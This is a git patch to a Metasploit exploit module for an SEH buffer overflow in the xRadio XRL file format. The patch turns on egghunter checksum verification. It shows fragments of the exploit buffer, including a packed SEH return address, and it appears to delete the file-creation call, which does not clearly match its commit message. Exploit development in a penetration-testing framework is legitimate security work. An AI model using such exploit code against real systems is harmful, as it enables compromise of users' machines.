From bce6c9abcfe4eae38a97cf2ca111d14384b32eba Mon Sep 17 00:00:00 2001 From: sinn3r Date: Thu, 19 Apr 2012 18:52:43 -0500 Subject: [PATCH] Verify checksum to avoid jumping to a corrupt payload --- modules/exploits/windows/fileformat/xradio_xrl_sehbof.rb | 6 ++---- 1 file changed, 2 insertions(+), 4 deletions(-) diff --git a/modules/exploits/windows/fileformat/xradio_xrl_sehbof.rb b/modules/exploits/windows/fileformat/xradio_xrl_sehbof.rb index 8251a77d84..d769c9f811 100644 --- a/modules/exploits/windows/fileformat/xradio_xrl_sehbof.rb +++ b/modules/exploits/windows/fileformat/xradio_xrl_sehbof.rb @@ -68,10 +68,9 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - eggoptions = { - :checksum => false, + :checksum => true, :eggtag => 'w00t' } @@ -85,8 +84,7 @@ class Metasploit3 < Msf::Exploit::Remote buffer << [target.ret].pack('V') # seh print_status("Creating '#{datastore['FILENAME']}' file ...") - file_create(buffer) - end + end